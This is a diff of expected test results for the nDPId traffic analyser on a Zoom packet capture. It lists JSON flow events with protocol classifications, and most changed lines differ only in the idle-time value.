-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":700,"packets-processed":697,"total-skipped-flows":0,"total-l4-data-len":329478,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":29,"total-detection-updates":23,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":211,"global_ts_msec":1569520473198} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/zoom2.pcap.out b/test/results/zoom2.pcap.out index bff452a86..645af5029 100644 --- a/test/results/zoom2.pcap.out +++ b/test/results/zoom2.pcap.out @@ -1,12 +1,12 @@ 